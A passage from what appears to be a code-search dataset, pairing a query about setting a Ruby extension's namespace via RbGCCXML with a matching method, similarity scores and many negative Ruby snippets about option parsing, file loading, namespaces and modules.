"def option_parser options\n CooCoo::OptionParser.new do |o|\n o.banner = \"The CIFAR data set\"\n \n o.on('--images-path PATH') do |path|\n options.images_paths << path\n end\n\n o.on('--labels-path PATH') do |path|\n options.labels_path = path\n end\n\n o.on('--translations INTEGER') do |n|\n options.translations = n.to_i\n end\n\n o.on('--translation-amount DEGREE') do |n|\n options.translation_amount = n.to_i\n end\n\n o.on('--rotations INTEGER') do |n|\n options.rotations = n.to_i\n end\n\n o.on('--rotation-amount DEGREE') do |n|\n options.rotation_amount = n.to_i\n end\n end\n end",
"def execute\n res = @include_list.map { |re_file| IO.read File.join(File.dirname(@file),re_file) }\n res << IO.read(@file)\n res.join \"\\n\"\n end",
"def parse_files(options)\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true, options.exclude)\n\n return [] if file_list.empty?\n\n jobs = SizedQueue.new(number_of_threads * 3)\n workers = []\n file_info = []\n file_info_lock = Mutex.new\n\n Thread.abort_on_exception = true\n @stats = Stats.new(file_list.size, options.verbosity)\n @stats.begin_adding(number_of_threads)\n\n # Create worker threads.\n number_of_threads.times do\n thread = Thread.new do\n while (filename = jobs.pop)\n @stats.add_file(filename)\n content = read_file_contents(filename)\n top_level = ::RDoc::TopLevel.new filename\n\n parser = ::RDoc::Parser.for(top_level, filename, content, options,\n @stats)\n result = parser.scan\n\n file_info_lock.synchronize do\n file_info << result\n end\n end\n end\n workers << thread\n end\n\n # Feed filenames to the parser worker threads...\n file_list.each do |filename|\n jobs << filename\n end\n workers.size.times do\n jobs << nil\n end\n\n # ...and wait until they're done.\n workers.each do |thread|\n thread.join\n end\n\n @stats.done_adding\n\n file_info\n end",
"def setup_options(rdoc_options)\n\n options = {\n :stylesheet_url => nil,\n #:index_attributes => false,\n #:ancestor_lists => false,\n #:list_standard_ancestors => false,\n :see_standard_ancestors => false,\n }\n\n rdoc_options.extend Options # 1. extend the existing object\n rdoc_options.class.include Options # 2. make sure #babel_options will be there on #dup'ed objects\n rdoc_options.babel_options = options\n\n opt = rdoc_options.option_parser\n\n opt.separator \"Babel options:\"\n opt.separator nil\n\n opt.on('--style=URL', '-s',\n 'Specifies the URL of a stylesheet',\n 'that the template should use.',\n 'The default is \"rdoc.css\".') do |value|\n options[:stylesheet_url] = value\n end\n opt.separator nil\n\n=begin\n opt.on('--index-attributes',\n 'Include attributes in the method index.',\n 'By default, only methods are included.') do |value|\n options[:index_attributes] = true\n end\n opt.separator nil\n\n opt.on('--ancestor-lists',\n 'Add lists of ancestor methods, attributes,',\n 'aliases and constants in the documentation',\n 'of a class/module.') do |value|\n options[:ancestor_lists] = true\n end\n opt.separator nil\n\n opt.on('--list-standard-ancestors',\n 'Include Kernel/Object methods',\n 'in ancestor methods.') do |value|\n options[:list_standard_ancestors] = true\n end\n opt.separator nil\n=end\n\n opt.on('--see-standard-ancestors',\n 'Add links to Kernel/Object',\n 'ancestor methods.') do |value|\n options[:see_standard_ancestors] = true\n end\n opt.separator nil\n\n end",
"def list_files(paths = T.unsafe(nil), options = T.unsafe(nil)); end",
"def list_files(paths = T.unsafe(nil), options = T.unsafe(nil)); end",
"def include_file(spec)\n elements << Raw.new(\" Include '#{spec}'\")\n end",
"def link_include_file(file); end",
"def link_include_file(file); end",
"def definition_file_paths; end",
"def load_path(match, options={})\n return [] if options[:from]\n\n options = valid_load_options(options)\n\n found = []\n $LOAD_PATH.uniq.each do |path|\n list = Dir.glob(File.join(File.expand_path(path), match))\n list = list.map{ |d| d.chomp('/') }\n # return absolute path unless relative flag\n if options[:relative]\n # the extra '' in File.join adds a '/' to the end of the path\n list = list.map{ |f| f.sub(File.join(path, ''), '') }\n end\n found.concat(list)\n end\n found\n end",
"def parse(args)\n @options = {\n reporters: [DEFAULT_REPORTER],\n }\n\n OptionParser.new do |parser|\n parser.banner = \"Usage: #{parser.program_name} [options] [scss-files]\"\n\n add_display_options parser\n add_linter_options parser\n add_file_options parser\n add_info_options parser\n end.parse!(args)\n\n # Any remaining arguments are assumed to be files\n @options[:files] = args\n\n @options\n rescue OptionParser::InvalidOption => e\n raise SCSSLint::Exceptions::InvalidCLIOption,\n e.message,\n e.backtrace\n end",
"def load_path(match, options={})\n options = valid_load_options(options)\n\n specs = specifications(options)\n\n matches = []\n specs.each do |spec|\n list = []\n spec.require_paths.each do |path|\n glob = File.join(spec.full_gem_path, path, match)\n list = Dir[glob] #.map{ |f| f.untaint }\n list = list.map{ |d| d.chomp('/') }\n # return relative paths unless absolute flag\n if options[:relative] #not options[:absolute]\n # the extra '' in File.join adds a '/' to the end of the path\n list = list.map{ |f| f.sub(File.join(spec.full_gem_path, path, ''), '') }\n end\n matches.concat(list)\n end\n # activate the library if activate flag\n spec.activate if options[:activate] && !list.empty?\n end\n matches\n end",
"def command\n log.debug self.pretty_inspect\n\n throw 'Invalid linker' unless @ld.is_a?(Linker)\n throw 'One or more source files are required' unless @sources.length > 0\n# cflags = default_flags\n# cflags.concat @flags\n# end\n# throw cflags\n\n# topdir = h[:topdir] || ''\n# ld = @ld\n# ldadd = h[:ldadd]\n# ld.flags = h[:ldflags]\n# ld.output = Platform.pathspec(h[:output])\n# ld.rpath = h[:rpath] if h[:rpath].length > 0\n\n# inputs = h[:sources]\n# inputs = [ inputs ] if inputs.is_a? String\n# inputs = inputs.map { |x| Platform.pathspec(topdir + x) }\n# throw 'One or more sources are required' unless inputs.count\n\n#TODO:if @combine\n# return [ @path, cflags, '-combine', ldflags, inputs, ldadd ].flatten.join(' ')\n#\n \n cmd = [ @path, '-DHAVE_CONFIG_H', '-I.', @platform_cflags, flags, '-c', @sources ].flatten.join(' ')\n\n cmd += Platform.dev_null if @quiet\n\n log.debug \"Compiler command: #{cmd}\"\n\n cmd\n end",
"def parse_args(args)\n options = {\n :excount => 5,\n :testdata => nil,\n :console => false,\n :raw => false,\n :pronounciation_offset => 1,\n :definition_offset => 2,\n :url => \"m\"\n }\n\n opt_parser = OptionParser.new do |opts|\n opts.banner = \"Usage: #{$0} <input filepath> [options]\"\n\n opts.separator \"\"\n opts.separator \"Data options:\"\n opts.on(\"-p N\", Integer, \"Offset to pronunciation column, default 1\") do |n|\n options[:pronounciation_offset] = n\n end\n opts.on(\"-d N\", Integer, \"Offset to definition column, default 2\") do |n|\n options[:definition_offset] = n\n end\n opts.on(\"-n N\", Integer, \"Number of example sentences, default 5\") do |n|\n options[:excount] = n\n end\n opts.on(\"-u U\", String, \"Source url (#{WWWJDICExampleProvider::SOURCES.to_s}), default #{options[:url]}\") do |u|\n options[:url] = u\n end\n\n opts.separator \"\"\n opts.separator \"Testing:\"\n opts.on(\"-t\", \"--testdata [DATAFILE]\",\n \"Path to yaml data file of examples (useful for testing)\") do |d|\n options[:testdata] = d\n end\n\n opts.separator \"\"\n opts.separator \"Output:\"\n opts.on(\"-c\", \"--console\", \"Dump to console only\") do |c|\n options[:console] = c\n end\n opts.on(\"-r\", \"--raw\", \"Output raw data (all examples)\") do |c|\n options[:raw] = c\n end\n\n opts.separator \"\"\n opts.on_tail(\"-h\", \"--help\", \"Show this message\") do\n puts opts\n exit\n end\n end\n\n opt_parser.parse!(args)\n options\nend",
"def find(path, options={})\n path = path.to_s\n\n suffix = options[:suffix]\n search = options[:search]\n legacy = options[:legacy]\n\nprint path if MONITOR\n\n # Ruby appears to have a special exception for enumerator!!!\n #return nil if path == 'enumerator' \n\n # TODO: absolute path ???\n if /^\\// =~ path\n return nil\n end\n\n if path.index(':') # a specified library\n name, path = path.split(':')\n lib = Library.open(name)\n file = lib.include?(path, options)\nputs \" (1 direct)\" if MONITOR\n return file\n end\n\n # try the load stack (TODO: just last or all?)\n load_stack.reverse_each do |lib|\n if file = lib.include?(path, options)\nputs \" (2 stack)\" if MONITOR\n return file\n end\n end\n #last = load_stack.last\n #if last && file = last.include?(file)\n # return file\n #end\n\n # if the head of the path is the library\n if path.index('/') or path.index('\\\\')\n name, *_ = path.split(/\\/|\\\\/)\n lib = Library[name]\n if lib && file = lib.include?(path, options)\nputs \" (3 indirect)\" if MONITOR\n return file\n end\n end\n\n # try ruby\n lib = Library['ruby']\n if file = lib.include?(path, options)\nputs \" (4 ruby core)\" if MONITOR\n return file\n end\n \n # a plain library name?\n if !path.index('/') && lib = Library.instance(path)\n if file = lib.default # default file to load\nputs \" (5 plain library name)\" if MONITOR\n return file\n end\n end\n\n # if fallback to brute force search\n if search or legacy\n result = search(path, options)\nputs \" (6 brute search)\" if MONITOR\n return result if result\n end\n\nputs \" (7 fallback)\" if MONITOR\n nil\n end",
"def parse(args)\n arg_list = arg_groups(args)\n options = DEFAULT_OPTIONS.dup\n options[:exclude] += default_excludes\n options[:locations] = arg_list.shift\n\n arg_list.reject(&:empty?).each do |set|\n flag, *args = set\n args.map! { |arg| arg.delete(\"/\") } # \"log/\" => \"log\"\n\n case flag\n when '-f', '--flags' then options[:flags] += args\n when '-e', '--exclude' then options[:exclude] += args\n else puts \"Unknown argument: #{flag}\"\n end\n end\n\n options\n end",
"def initialize(options)\n if (@json_paths = options[:paths]).nil?\n puts 'Please specify path to JSON files with --paths'\n exit 1\n end\n end"
] |
[
"0.6914934",
"0.6285592",
"0.60384244",
"0.58239883",
"0.5822146",
"0.57213515",
"0.5713939",
"0.5686055",
"0.5673936",
"0.5671525",
"0.5652372",
"0.56276816",
"0.55707955",
"0.5570621",
"0.5567354",
"0.55640113",
"0.55187756",
"0.5454527",
"0.5442466",
"0.5412935",
"0.54004455",
"0.53819674",
"0.5359477",
"0.5353765",
"0.53508973",
"0.53230876",
"0.53159726",
"0.5263498",
"0.524566",
"0.52416205",
"0.52255464",
"0.52146214",
"0.52126485",
"0.52065146",
"0.5181748",
"0.5178305",
"0.5176764",
"0.5169973",
"0.5160749",
"0.5158589",
"0.51451945",
"0.5143236",
"0.5129177",
"0.5128268",
"0.5125288",
"0.5124706",
"0.50886256",
"0.50848985",
"0.50848883",
"0.506889",
"0.50684345",
"0.50669754",
"0.5062346",
"0.5056678",
"0.50461775",
"0.5038622",
"0.50350165",
"0.50283706",
"0.502201",
"0.5015353",
"0.50083435",
"0.50016385",
"0.49946064",
"0.4991444",
"0.49892244",
"0.49802092",
"0.49636543",
"0.49621168",
"0.49571186",
"0.4952758",
"0.4946889",
"0.49462056",
"0.49396417",
"0.4937052",
"0.49266243",
"0.49215674",
"0.49190497",
"0.4914453",
"0.48959506",
"0.4891163",
"0.48740122",
"0.4873259",
"0.48352197",
"0.48346236",
"0.4831704",
"0.48261264",
"0.48192194",
"0.48178896",
"0.48105025",
"0.4806578",
"0.4806578",
"0.47962633",
"0.47904158",
"0.47859815",
"0.47811705",
"0.47683334",
"0.47651544",
"0.47586456",
"0.47557524",
"0.47541365"
] |
0.65172637
|
1
|
Set a namespace to be the main namespace used for this extension. Specifing a namespace on the Extension itself will mark functions, class, enums, etc to be globally available to Ruby (aka not in it's own module) To get access to the underlying RbGCCXML query system, save the return value of this method: node = namespace "lib::to_wrap"
|
def namespace(name)
@node = @parser.namespaces(name)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def namespace=(ns); end",
"def namespace=(ns); end",
"def set_namespace(namespace)\n return unless namespace\n\n @namespace = namespace\n @ext.set_namespace(namespace)\n end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def namespace; end",
"def get_namespace(node, prefix); end",
"def namespace(namespace = nil)\n @namespace = namespace if namespace\n @namespace\n end",
"def namespace(namespace = nil)\n @namespace = namespace if namespace\n @namespace if defined? @namespace\n end",
"def set_namespace(ns = '')\n settings['namespace'] = ns\n end",
"def namespace=(v); end",
"def namespace\n @namespace.ns\n end",
"def namespace\n @namespace\n end",
"def namespace=(ns)\n return set_namespace(ns) unless ns\n\n unless Nokogiri::XML::Namespace === ns\n raise TypeError, \"#{ns.class} can't be coerced into Nokogiri::XML::Namespace\"\n end\n if ns.document != document\n raise ArgumentError, \"namespace must be declared on the same document\"\n end\n\n set_namespace ns\n end",
"def xml_namespace(node, name, uri, namespaces = {})\n XML::Namespace.new(node, name, uri)\n end",
"def ns(ns)\n self.namespace = ns\n self\n end",
"def fix_namespaces(doc)\n if is_jruby?\n # Only needed in jruby, nokogiri's jruby implementation isn't weird\n # around namespaces in exactly the same way as MRI. We need to keep\n # track of the namespaces in outer contexts ourselves, and then see\n # if they are needed ourselves. :(\n namespaces = namespaces_stack.compact.reduce({}, :merge)\n default_ns = namespaces.delete(\"xmlns\")\n\n namespaces.each_pair do |attrib, uri|\n ns_prefix = attrib.sub(/\\Axmlns:/, '')\n\n # gotta make sure it's actually used in the doc to not add it\n # unecessarily. GAH.\n if doc.xpath(\"//*[starts-with(name(), '#{ns_prefix}:')][1]\").empty? &&\n doc.xpath(\"//@*[starts-with(name(), '#{ns_prefix}:')][1]\").empty?\n next\n end\n doc.root.add_namespace_definition(ns_prefix, uri)\n end\n\n if default_ns\n doc.root.default_namespace = default_ns\n # OMG nokogiri, really?\n default_ns = doc.root.namespace\n doc.xpath(\"//*[namespace-uri()='']\").each do |node|\n node.namespace = default_ns\n end\n end\n\n end\n return doc\n end",
"def add_namespaces node\n raw.root.namespace_definitions.each do |ns|\n node.add_namespace_definition ns.prefix, ns.href if ns.href != NS\n end\n end",
"def namespace=(value)\n @namespace = value\n end",
"def namespace=(value)\n @namespace = value\n end",
"def namespace(namespace = nil, options = {})\n return @namespace unless namespace\n\n @namespace = namespace.to_sym if namespace\n @base_namespace = options[:base].to_sym if options[:base]\n end",
"def namespace\n NAMESPACE\n end",
"def namespace=(obj); end",
"def namespace(value = nil)\n if value\n @namespace = value\n else\n @namespace\n end\n end",
"def namespace\n @namespace || self.class.namespace\n end",
"def namespace=(ns) @namespace = @store.namespace = ns; end",
"def namespace(namespace, &block)\n ::Dry::Container::NamespaceDSL.new(\n self,\n namespace,\n config.namespace_separator,\n &block\n )\n\n self\n end",
"def namespace(prefix = T.unsafe(nil)); end",
"def namespace(ns)\n if ns == :interpreter\n self\n else\n @storage[ns]\n end\n end",
"def namespace\n return NAMESPACE\n end",
"def namespace(path, options = T.unsafe(nil)); end",
"def namespace\n read_property 'RootNamespace'\n end",
"def namespace\n nil\n end",
"def rootNamespace\n @namespace ? @namespace.rootNamespace : self\n end",
"def namespace\n nil\n end",
"def namespace\n @namespace ||= schema.attributes['Namespace'].value\n end",
"def namespace\n self.class.new split(NAMESPACE_SEPARATOR).first\n end",
"def isolate_namespace(mod); end",
"def isolate_namespace(mod); end",
"def parsingNamespace \n \"parsingNamespace\" \n end",
"def set_default_namespace(value = nil, &block)\n define_attr_method :default_namespace, value, &block\n end",
"def namespace(value)\n merge(namespace: value.to_s)\n end",
"def namespace\n return @namespace\n end",
"def namespace\n return @namespace\n end",
"def namespace=(value)\n self.namespaces = [value]\n end",
"def namespace\n @namespace ||= metadata.xpath('//Schema').first.attributes['Namespace'].value\n end",
"def element_by_xpath_with_default_namespace(xpath_without_ns)\n xpath_without_ns = xpath_without_ns.to_s\n @xml.xpath(xpath_without_ns.gsub(/(^|\\/{1,2})(\\w+)/, '\\1xmlns:\\2'), :xmlns => OMF_NAMESPACE)\n end",
"def extract_namespace node\n node.ancestors[0].to_s\n end",
"def set_namespace(namespace)\n return if !active? ||\n Appsignal::Transaction.current.nil? ||\n namespace.nil?\n Appsignal::Transaction.current.set_namespace(namespace)\n end",
"def on_axis_namespace(ast_node, context)\n nodes = XML::NodeSet.new\n name = ast_node.children[1]\n\n context.each do |context_node|\n next unless context_node.respond_to?(:available_namespaces)\n\n context_node.available_namespaces.each do |_, namespace|\n if namespace.name == name or name == '*'\n nodes << namespace\n end\n end\n end\n\n return nodes\n end",
"def namespace\n # Not using superclass_delegating_reader because don't want subclasses to modify superclass instance\n #\n if defined?(@namespace)\n @namespace\n elsif superclass != Object && superclass.site\n superclass.site.dup.freeze\n end\n end",
"def namespace=( namespace )\n\t\t@namespace = namespace.nil? ? nil : namespace.to_sym\n\tend",
"def node_ns_definition(node, ns)\n prefix = ns.is_a?(Nokogiri::XML::Namespace) ? ns.prefix : ns\n node.namespace_definitions.find { |n| n.prefix == prefix }\n end",
"def namespace=(namespace)\n @connection = nil\n if namespace.nil?\n @namespace = nil\n else\n @namespace = namespace\n end\n end",
"def start_element_namespace(name, attrs = T.unsafe(nil), prefix = T.unsafe(nil), uri = T.unsafe(nil), ns = T.unsafe(nil)); end",
"def start_element_namespace(name, attrs = T.unsafe(nil), prefix = T.unsafe(nil), uri = T.unsafe(nil), ns = T.unsafe(nil)); end",
"def namespace\n if Types.use_namespaces?\n 'MG'\n else\n ''\n end\n end",
"def namespace_declarations(ctx); end",
"def namespace_declarations(ctx); end",
"def namespace\n self.class.namespace\n end",
"def fix_namespace api, namespace\n namespace.split(\"::\").map { |node| api.fix_namespace node }.join(\"::\")\n end",
"def namespaces; end",
"def namespaces; end",
"def namespaces; end",
"def namespaces; end",
"def namespace=(v)\n cfg_set(:namespace, v)\n end",
"def namespace_inheritance=(_arg0); end",
"def namespace_inheritance=(_arg0); end",
"def namespace(name)\n @node = @parser.namespaces.find(:all, :name => name)\n end",
"def namespace(ns)\n ns.blank? ? \"nil\" : %|\"#{ns.prefix}\"|\nend",
"def namespace=(v)\n cfg_set(:namespace, v)\n end",
"def render namespace\n context = Context.new(namespace)\n context.push(\n :ruty => RUTY_CONTEXT,\n :nil => nil,\n :true => true,\n :false => false\n )\n result = ''\n @nodelist.render_node(context, result)\n result\n end",
"def custom_namespace\n @attributes[:custom_namespace]\n end",
"def node_namespace name:\n label = make_label name\n attrs = { name: name }\n\n add_node :Namespace, label, attrs\n end",
"def define_namespaces #:nodoc:\n unless self.respond_to?(:namespaces)\n send(:define_singleton_method, :namespaces) { @namespaces }\n send(:define_method, :namespaces) { self.class.namespaces }\n end\n end",
"def add_namespaces( node, namespaces )\n #pass nil as the prefix to create a default node\n default = namespaces.delete( \"default\" )\n node.namespaces.namespace = XML::Namespace.new( node, nil, default )\n namespaces.each do |prefix, prefix_uri|\n XML::Namespace.new( node, prefix, prefix_uri )\n end\n end",
"def namespace\n @namespace ||= 'silver_spoon'\n end",
"def set_namespace\n @namespace = Namespace.find(params[:namespace_id])\n end",
"def goo_namespaces\n return if defined?(@@configured) && @@configured\n Goo.configure do |conf|\n conf.add_namespace(:omv, RDF::Vocabulary.new(\"http://omv.ontoware.org/2005/05/ontology#\"))\n conf.add_namespace(:skos, RDF::Vocabulary.new(\"http://www.w3.org/2004/02/skos/core#\"))\n conf.add_namespace(:owl, RDF::Vocabulary.new(\"http://www.w3.org/2002/07/owl#\"))\n conf.add_namespace(:rdfs, RDF::Vocabulary.new(\"http://www.w3.org/2000/01/rdf-schema#\"))\n conf.add_namespace(:metadata, RDF::Vocabulary.new(\"http://data.bioontology.org/metadata/\"), default = true)\n conf.add_namespace(:metadata_def, RDF::Vocabulary.new(\"http://data.bioontology.org/metadata/def/\"))\n conf.add_namespace(:dc, RDF::Vocabulary.new(\"http://purl.org/dc/elements/1.1/\"))\n conf.add_namespace(:xsd, RDF::Vocabulary.new(\"http://www.w3.org/2001/XMLSchema#\"))\n conf.add_namespace(:oboinowl_gen, RDF::Vocabulary.new(\"http://www.geneontology.org/formats/oboInOWL#\"))\n conf.add_namespace(:obo_purl, RDF::Vocabulary.new(\"http://purl.obolibrary.org/obo/\"))\n conf.add_namespace(:umls, RDF::Vocabulary.new(\"http://bioportal.bioontology.org/ontologies/umls/\"))\n conf.id_prefix = \"http://data.bioontology.org/\"\n conf.pluralize_models(true)\n end\n @@configured = true\n end",
"def get_namespace( node, prefix )\n if @namespaces\n return @namespaces[prefix] || ''\n else\n return node.namespace( prefix ) if node.node_type == :element\n return ''\n end\n end",
"def emit_bnode_namespace(collector, namespace)\n if collector and collector.respond_to? :bnode_namespace=\n collector.bnode_namespace = namespace\n end\n end",
"def namespace\n Matsuri::Platform.send(Matsuri::Config.environment).namespace || 'default'\n end",
"def end_element_namespace(name, prefix = T.unsafe(nil), uri = T.unsafe(nil)); end",
"def end_element_namespace(name, prefix = T.unsafe(nil), uri = T.unsafe(nil)); end",
"def add_namespace(namespace) \n @namespaces[namespace.name] = namespace\n end",
"def inherited_namespace(prefix=inherited_prefix)\n namespace(prefix)\n end",
"def parse_namespace\n skip_tkspace\n\n tk = get_tk\n\n namespace = @container.add_module RDoc::RakeNamespace, tk.text[1..-1]\n\n skip_tkspace\n\n old_namespace = @container\n\n begin\n @nest += 1\n @container = namespace\n\n parse_rakefile\n ensure\n @container = old_namespace\n @nest -= 1\n end\n end",
"def setNamespace(prefix, uri) \n @obj.setNamespace(prefix, uri)\n end",
"def namespace\n @namestack.join(\"::\")\n end",
"def define_namespace_method(scope, name, opts = {}, &block)\n method = scope == :instance ? :define_singleton_method : :define_method\n\n send(method, name) do\n ivar = instance_variable_get(:\"@#{name}\")\n return ivar unless ivar.nil?\n\n namespace_element = @xml_element.locate(opts[:xpath]).first\n\n namespace = Namespace.new(name.to_sym, namespace_element, &block)\n\n instance_variable_set(:\"@#{name}\", namespace)\n end\n end",
"def default_namespace(url)\n @namespaces[''] = url\n end",
"def test_namespace\n N::Namespace.shortcut(:test_namespace, \"http://test_namespace/\")\n assert_equal(:test_namespace, N::URI.new(\"http://test_namespace/\").namespace)\n assert_equal(:test_namespace, N::URI.new(\"http://test_namespace/else\").namespace)\n assert_equal(nil, N::URI.new(\"http://test_namespace/else/other\").namespace)\n end",
"def namespaces\n root ? root.namespaces : {}\n end",
"def namespace\n @namespace ||= [request.args.namespace_name, request.args.application_name].compact.join('-')\n end",
"def namespace(arg = T.unsafe(nil)); end"
] |
[
"0.66401315",
"0.66401315",
"0.6406295",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.6178743",
"0.61648786",
"0.6104583",
"0.60997504",
"0.6025059",
"0.6011422",
"0.60000217",
"0.592806",
"0.5899432",
"0.58949035",
"0.58898",
"0.5887394",
"0.58839947",
"0.58737606",
"0.58737606",
"0.5855702",
"0.5841067",
"0.5826671",
"0.5814587",
"0.58042175",
"0.5799384",
"0.579186",
"0.5779668",
"0.57494396",
"0.57204646",
"0.5702763",
"0.5698502",
"0.56841844",
"0.56620926",
"0.5659396",
"0.5655202",
"0.5642441",
"0.5624832",
"0.5624832",
"0.56017643",
"0.55685395",
"0.5566532",
"0.55527204",
"0.55527204",
"0.5542784",
"0.5520879",
"0.5506518",
"0.5487226",
"0.54863656",
"0.54847187",
"0.54502",
"0.54494715",
"0.54418623",
"0.5434692",
"0.54310447",
"0.54310447",
"0.5424215",
"0.53908694",
"0.53908694",
"0.5373441",
"0.5372519",
"0.5370403",
"0.5370403",
"0.5370403",
"0.5370403",
"0.53648865",
"0.5330579",
"0.5330579",
"0.5327341",
"0.5326872",
"0.53268677",
"0.53120095",
"0.5309422",
"0.5303572",
"0.5301154",
"0.5293825",
"0.5286955",
"0.5282032",
"0.52539426",
"0.52281624",
"0.52206296",
"0.5207745",
"0.52073276",
"0.52073276",
"0.5203742",
"0.5201405",
"0.51928824",
"0.5186996",
"0.51630414",
"0.51621526",
"0.51526636",
"0.5147916",
"0.51303315",
"0.5129925",
"0.5125721"
] |
0.54854494
|
54
|
Mark that this extension needs to create a Ruby module of a give name. Like Extension.new, this can be used with or without a block.
|
def module(name, &block)
m = RbModule.new(name, @parser, &block)
@modules << m
m
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_module(name, &block)\n mod = Module.new(&block)\n @managed.const_set(name, mod)\n mod\n end",
"def create(name)\n\t\t# Check to see if it has a module type prefix. If it does,\n\t\t# try to load it from the specific module set for that type.\n\t\tif (md = name.match(/^(#{MODULE_TYPES.join('|')})\\/(.*)$/))\n\t\t\tmodule_sets[md[1]].create(md[2])\n\t\t# Otherwise, just try to load it by name.\n\t\telse\n\t\t\tsuper\n\t\tend\n\tend",
"def include_new_module(module_name, &content)\n include Named::Module.new(module_name, &content)\n end",
"def module(name, &block)\n m = RbModule.new(name, @parser, &block)\n m.parent = self\n @modules << m\n end",
"def on_module(node)\n define_module(node, DefinitionBuilder::RubyModule)\n end",
"def register(&block)\n extend Module.new(&block)\n end",
"def make_global!\n @is_module = true\n end",
"def definition\n \"module #{full_name}\"\n end",
"def add_module(name)\n require name\n\n m = name.downcase.gsub(File::SEPARATOR, '_')\n method(\"dispatch_#{m}\".intern).call(self)\n\n self\n end",
"def definition_extension(*names, &block)\n eigenclass = class << self; self; end\n unless names.empty?\n names.each do |name|\n eigenclass.__send__(:include, name)\n end\n end\n eigenclass.send(:class_eval, &block) if block\n end",
"def util_dummy_extension(spec, name = \"a\")\n extconf = File.join(\"ext\", name, \"extconf.rb\")\n dummy_c = File.join(\"ext\", name, \"dummy.c\")\n\n spec.extensions << extconf\n spec.files << dummy_c\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(extconf)\n\n # extconf.rb\n File.open extconf, \"w\" do |f|\n f.write <<~EOF\n require \"mkmf\"\n\n create_makefile(\"#{name}\")\n EOF\n end\n\n # dummy.c\n File.open dummy_c, \"w\" do |f|\n f.write <<~EOF\n #include <ruby.h>\n\n void Init_#{name}(void)\n {\n rb_p(ID2SYM(rb_intern(\"ok\")));\n }\n EOF\n end\n end\n end",
"def add_module(module_name, options = T.unsafe(nil)); end",
"def add_module(name)\n add_namespace(name, \"\")\n end",
"def extended(a_module)\n end",
"def create(name)\n\t\t\n\t\t# if (mod_ambiguous[name])\n\t\t#\traise Rex::AmbiguousArgumentError.new(name), \n\t\t#\t\t\"The module name #{name} is ambiguous.\", caller\n\t\t# end\n\n\t\tklass = get_hash_val(name)\n\t\tinstance = nil\n\n\t\t# If there is no module associated with this class, then try to demand\n\t\t# load it.\n\t\tif (klass.nil? or klass == SymbolicModule)\n\t\t\t# If we are the root module set, then we need to try each module\n\t\t\t# type's demand loading until we find one that works for us.\n\t\t\tif (module_type.nil?)\n\t\t\t\tMODULE_TYPES.each { |type|\n\t\t\t\t\tframework.modules.demand_load_module(type + '/' + name)\n\t\t\t\t}\n\t\t\telse\n\t\t\t\tframework.modules.demand_load_module(module_type + '/' + name)\n\t\t\tend\n\n\t\t\tklass = get_hash_val(name)\n\t\tend\n\n\t\t# If the klass is valid for this name, try to create it\n\t\tif (klass and klass != SymbolicModule)\n\t\t\tinstance = klass.new\n\t\tend\n\n\t\t# Notify any general subscribers of the creation event\n\t\tif (instance)\n\t\t\tself.framework.events.on_module_created(instance)\n\t\tend\n\n\t\treturn instance\n\tend",
"def create_module_and_branch?(opts = {})\n if module_obj = module_exists?\n module_branch_exists? || create_module_branch(module_obj)\n else\n create_module_and_branch(create_implementation: opts[:create_implementation])\n end\n end",
"def register_module\n unless Object.const_defined? module_name\n Object.const_set module_name, Module.new\n end\n end",
"def setup_module(module_name)\n Object.make_module(module_name)\n slice_mod = Object.full_const_get(module_name)\n slice_mod.extend(ModuleMixin)\n slice_mod\n end",
"def def_module(methodname='erb')\n mod = Module.new\n def_method(mod, methodname, @filename || '(ERB)')\n mod\n end",
"def generate_module(module_name, env_name, modulepath)\n module_pp = <<-MANIFEST_SNIPPET\n \"#{modulepath}\":;\n \"#{modulepath}/#{module_name}\":;\n \"#{modulepath}/#{module_name}/manifests\":;\n\n \"#{modulepath}/#{module_name}/manifests/init.pp\":\n ensure => file,\n content => 'class #{module_name} {\n notify { \"include #{env_name} #{module_name}\": }\n }'\n ;\n MANIFEST_SNIPPET\n end",
"def mod(rule, &block)\n rule.extension = Module.new(&block)\n rule\n end",
"def add(modName,privMsg=false)\n begin\n if @dir.find{|file| file.sub!(/\\.rb$/,\"\"); file == modName} \t\n load \"./lib/modules/#{modName}.rb\"\n klass = \"linael/modules/#{modName}\".camelize.constantize\n if (has_key?(klass::Name))\n answer(privMsg,\"Module already loaded, please unload first\")\n else\n if (klass.require_auth && @authModule.empty?)\n answer(privMsg,\"You need at least one authMethod to load this module\") \n else\n if matchRequirement?(klass.required_mod)\n mod = Modules::ModuleType.new(@runner,klass: klass,privMsg: privMsg)\n addMod(mod)\n @authModule << klass::Name if klass::auth?\n answer(privMsg,\"Module #{modName} loaded!\")\n else\n answer(privMsg,\"You do not have loaded all the modules required for this module.\") \n answer(privMsg,\"Here is the list of requirement: #{klass.required_mod.join(\" - \")}.\") \n end\n end\n end\n end\n rescue Exception\n puts $!\n answer(privMsg,\"Problem when loading the module\") \n talk(privMsg.who,$!) \n end\n end",
"def create_module\n template 'bpmn_module.rb.template', File.join(model_path, \"#{module_name.underscore}.rb\")\n end",
"def ensure_outer_module_declarations(mod); end",
"def add_module(mod, name, modinfo = nil)\n\n\n\t\t# Set the module's name so that it can be referenced when\n\t\t# instances are created.\n\t\tmod.framework = framework\n\t\tmod.refname = name\n\t\tmod.file_path = ((modinfo and modinfo['files']) ? modinfo['files'][0] : nil)\n\t\tmod.orig_cls = mod\n\n\t\tif (get_hash_val(name) and get_hash_val(name) != SymbolicModule)\n\t\t\tmod_ambiguous[name] = true\n\n\t\t\twlog(\"The module #{mod.refname} is ambiguous with #{self[name].refname}.\")\n\t\telse\n\t\t\tself[name] = mod\n\t\tend\n\n\t\t# Check to see if we should update info\n\t\tnoup = true if (modinfo and modinfo['noup'])\n\n\t\t# Add this module to the module cache for this type\n\t\tframework.modules.cache_module(mod) if (noup != true)\n\t\n\t\t# Invalidate the sorted array\n\t\tinvalidate_sorted_cache\n\n\t\t# Return the modlicated instance for use\n\t\tmod\n\tend",
"def association_module_def(name, opts=OPTS, &block)\n association_module(opts).module_eval{define_method(name, &block)}\n end",
